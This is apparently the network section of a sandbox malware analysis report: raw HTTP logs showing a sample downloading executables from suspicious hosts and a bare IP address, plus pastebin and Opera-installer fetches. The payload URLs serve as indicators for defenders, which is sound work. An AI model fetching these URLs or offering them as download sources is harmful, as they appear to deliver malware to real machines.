Network Analysis

GET /RNWPd.exe HTTP/1.1 Host: yip.su Connection: Keep-Alive

HTTP/1.1 200 OK Date: Sun, 29 Oct 2023 22:42:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive expires: Sun, 29 Oct 2023 22:42:58 +0000 strict-transport-security: max-age=604800 strict-transport-security: max-age=31536000 content-security-policy: img-src https: data:; upgrade-insecure-requests x-frame-options: SAMEORIGIN Cache-Control: max-age=14400 CF-Cache-Status: EXPIRED Last-Modified: Sun, 29 Oct 2023 19:45:17 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uROhJ89IDIfHTD%2FHdP%2BIbWj1tjRSfC%2BB7J72kUNusQf0NlSjKJ78HP5pW7REBbBQIoVKCuXMIfxvMv0h%2FNG7QPfGjeAsfjGdky2O5P%2BxzhPGCuE9L5%2FzpdI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 81deef49286a14da-LAX alt-svc: h3=":443"; ma=86400

GET /raw/E0rY26ni HTTP/1.1 Host: pastebin.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Sun, 29 Oct 2023 22:42:58 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: MISS Last-Modified: Sun, 29 Oct 2023 22:42:58 GMT Server: cloudflare CF-RAY: 81deef492ecc527b-LAX

GET /opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767 HTTP/1.1 Host: net.geo.opera.com Connection: Keep-Alive

HTTP/1.1 200 OK Server: nginx Date: Sun, 29 Oct 2023 22:43:00 GMT Content-Type: application/octet-stream Transfer-Encoding: chunked Connection: keep-alive Content-Disposition: attachment; filename=OperaSetup.exe ETag: "4d68aad13445d83897422da70890be29" Strict-Transport-Security: max-age=31536000; includeSubDomains

GET /files/My2.exe HTTP/1.1 Host: 85.217.144.143 Connection: Keep-Alive

HTTP/1.1 200 OK Date: Sun, 29 Oct 2023 22:42:59 GMT Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28 Last-Modified: Thu, 26 Oct 2023 19:21:10 GMT ETag: "53d718-608a379705a2c" Accept-Ranges: bytes Content-Length: 5494552 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload

GET /order/tuc15.exe HTTP/1.1 Host: pic.himanfast.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Sun, 29 Oct 2023 22:42:59 GMT Content-Type: application/octet-stream Content-Length: 3002749 Connection: keep-alive Content-Description: File Transfer Content-Disposition: attachment; filename=tuc15.exe Content-Transfer-Encoding: binary Expires: 0 Cache-Control: max-age=120, must-revalidate Pragma: public CF-Cache-Status: EXPIRED Last-Modified: Sun, 29 Oct 2023 18:55:31 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Y4rn%2B%2BZO34LOvMSB4gS1IoH0DOTq0ojysMQqTD9OvNZ%2BTs6biyHmsrwlJ145ESDTx%2FLgyy%2F0c3e5sBjlMKQyNOjdspOaC3n9zsxM458mVpXkmM0v3zzceeysei3m42UdHX%2F%2BGA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 81deef4f1c927d82-LAX alt-svc: h3=":443"; ma=86400

GET /InstallSetup6.exe HTTP/1.1 Host: dl2-broomcleaner.online Connection: Keep-Alive

HTTP/1.1 200 OK Date: Sun, 29 Oct 2023 22:42:59 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Sat, 28 Oct 2023 16:56:59 GMT ETag: "28c50e-608c9b175ccc0" Accept-Ranges: bytes Content-Length: 2671886 Connection: close Content-Type: application/x-msdos-program

GET /downloads/toolspub1.exe HTTP/1.1 Host: galandskiyher5.com Connection: Keep-Alive

HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Sun, 29 Oct 2023 22:42:59 GMT Content-Type: application/x-msdos-program Content-Length: 266240 Connection: close Last-Modified: Fri, 20 Oct 2023 18:45:01 GMT ETag: "41000-6082a451f2224" Accept-Ranges: bytes

GET /opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767 HTTP/1.1 Host: net.geo.opera.com Connection: Keep-Alive

HTTP/1.1 301 Moved Permanently Server: nginx Date: Sun, 29 Oct 2023 22:42:59 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Location: https://net.geo.opera.com/opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-Robots-Tag: noindex Referrer-Policy: same-origin Last-Modified: Fri, 13 Oct 2023 16:28:31 GMT ETag: "37d-6079b8c0929c0" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Sun, 29 Oct 2023 23:42:59 GMT Date: Sun, 29 Oct 2023 22:42:59 GMT Connection: keep-alive

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-Robots-Tag: noindex Referrer-Policy: same-origin Last-Modified: Fri, 13 Oct 2023 16:28:31 GMT ETag: "37d-6079b8c0929c0" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Sun, 29 Oct 2023 23:42:59 GMT Date: Sun, 29 Oct 2023 22:42:59 GMT Connection: keep-alive

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-Robots-Tag: noindex Referrer-Policy: same-origin Last-Modified: Fri, 13 Oct 2023 16:28:31 GMT ETag: "37d-6079b8c0929c0" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Sun, 29 Oct 2023 23:42:59 GMT Date: Sun, 29 Oct 2023 22:42:59 GMT Connection: keep-alive